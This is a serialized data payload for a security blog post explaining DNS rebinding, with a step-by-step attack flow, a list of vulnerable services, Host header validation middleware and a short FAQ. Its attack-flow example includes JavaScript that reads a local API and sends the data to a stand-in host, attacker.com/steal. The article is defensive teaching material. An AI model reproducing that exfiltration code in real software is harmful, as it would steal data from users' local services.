[{"data":1,"prerenderedAt":167},["ShallowReactive",2],{"blog-vulnerabilities/dns-rebinding":3},{"id":4,"title":5,"body":6,"category":147,"date":148,"dateModified":148,"description":149,"draft":150,"extension":151,"faq":152,"featured":150,"headerVariant":153,"image":152,"keywords":152,"meta":154,"navigation":155,"ogDescription":156,"ogTitle":152,"path":157,"readTime":158,"schemaOrg":159,"schemaType":160,"seo":161,"sitemap":162,"stem":163,"tags":164,"twitterCard":165,"__hash__":166},"blog/blog/vulnerabilities/dns-rebinding.md","DNS Rebinding Explained",{"type":7,"value":8,"toc":140},"minimark",[9,16,21,43,58,62,80,84,93,109,128],[10,11,12],"tldr",{},[13,14,15],"p",{},"DNS rebinding tricks browsers into thinking a malicious site and your local service are the same origin. The attacker's domain initially resolves to their server, then rebinds to localhost. This bypasses same-origin policy, letting attackers access local services. Protect by validating the Host header.",[17,18,20],"h2",{"id":19},"how-dns-rebinding-works","How DNS Rebinding Works",[22,23,24,28,31,34,37,40],"ol",{},[25,26,27],"li",{},"Attacker controls evil.com which resolves to 1.2.3.4 (their server)",[25,29,30],{},"Victim visits evil.com, browser loads JavaScript",[25,32,33],{},"Attacker changes DNS to resolve evil.com to 127.0.0.1",[25,35,36],{},"JavaScript makes request to evil.com (now 127.0.0.1)",[25,38,39],{},"Browser thinks it is same-origin, allows the request",[25,41,42],{},"Attacker's script can now access local services",[44,45,47],"code-block",{"label":46},"Attack flow",[48,49,54],"pre",{"className":50,"code":52,"language":53},[51],"language-text","// Initial: evil.com -> 1.2.3.4 (attacker's server)\n// Victim visits https://evil.com\n// Attacker's JavaScript loads...\n\n// After DNS rebind: evil.com -> 127.0.0.1\nfetch('http://evil.com:8080/api/secrets')\n  // Browser resolves evil.com to 127.0.0.1\n  // Reaches local development server!\n  // Same-origin policy doesn't block it\n  .then(r => r.json())\n  .then(data => {\n    // Exfiltrate data to attacker's server\n    fetch('https://attacker.com/steal', {\n      method: 'POST',\n      body: JSON.stringify(data)\n    });\n  });\n","text",[55,56,52],"code",{"__ignoreMap":57},"",[17,59,61],{"id":60},"who-is-vulnerable","Who Is Vulnerable",[63,64,65,68,71,74,77],"ul",{},[25,66,67],{},"Development servers (localhost:3000, etc.)",[25,69,70],{},"IoT devices and smart home hubs",[25,72,73],{},"Database admin tools",[25,75,76],{},"Docker management interfaces",[25,78,79],{},"Any service binding to all interfaces (0.0.0.0)",[17,81,83],{"id":82},"how-to-prevent-dns-rebinding","How to Prevent DNS Rebinding",[44,85,87],{"label":86},"Validate Host header",[48,88,91],{"className":89,"code":90,"language":53},[51],"app.use((req, res, next) => {\n  const allowedHosts = ['localhost', '127.0.0.1', 'myapp.local'];\n  const host = req.headers.host?.split(':')[0];\n\n  if (!allowedHosts.includes(host)) {\n    return res.status(403).send('Invalid host');\n  }\n  next();\n});\n",[55,92,90],{"__ignoreMap":57},[94,95,96,103],"faq-section",{},[97,98,100],"faq-item",{"question":99},"Does HTTPS prevent DNS rebinding?",[13,101,102],{},"Partially. The attacker cannot get a valid certificate for localhost, so HTTPS services are safer. But HTTP services (common in development) are fully vulnerable.",[97,104,106],{"question":105},"How does this relate to SSRF?",[13,107,108],{},"DNS rebinding is client-side (browser-based), while SSRF is server-side. DNS rebinding abuses the victim's browser to reach local services; SSRF abuses the server itself.",[110,111,112,118,123],"related-articles",{},[113,114],"related-card",{"description":115,"href":116,"title":117},"Server-side version","/blog/vulnerabilities/ssrf","SSRF Explained",[113,119],{"description":120,"href":121,"title":122},"Another DNS attack","/blog/vulnerabilities/subdomain-takeover","Subdomain Takeover",[113,124],{"description":125,"href":126,"title":127},"Cross-origin issues","/blog/vulnerabilities/cors-misconfiguration","CORS Misconfiguration",[129,130,133,137],"cta-box",{"href":131,"label":132},"/","Start Free Scan",[17,134,136],{"id":135},"secure-your-services","Secure Your Services",[13,138,139],{},"Our scanner identifies services vulnerable to DNS rebinding.",{"title":57,"searchDepth":141,"depth":141,"links":142},2,[143,144,145,146],{"id":19,"depth":141,"text":20},{"id":60,"depth":141,"text":61},{"id":82,"depth":141,"text":83},{"id":135,"depth":141,"text":136},"vulnerabilities","2026-01-15","DNS rebinding lets attackers bypass same-origin policy by switching DNS resolution mid-session. Learn how it works and how to protect your local services.",false,"md",null,"red",{"noindex":155},true,"Learn how DNS rebinding attacks work and how to defend against them.","/blog/vulnerabilities/dns-rebinding","6 min read","[object Object]","TechArticle",{"title":5,"description":149},{"loc":157},"blog/vulnerabilities/dns-rebinding",[],"summary_large_image","EWNBoSgX51lp6T9uBzOhJedQEXizhyHmAxTmzcsHXw4",1775843926845]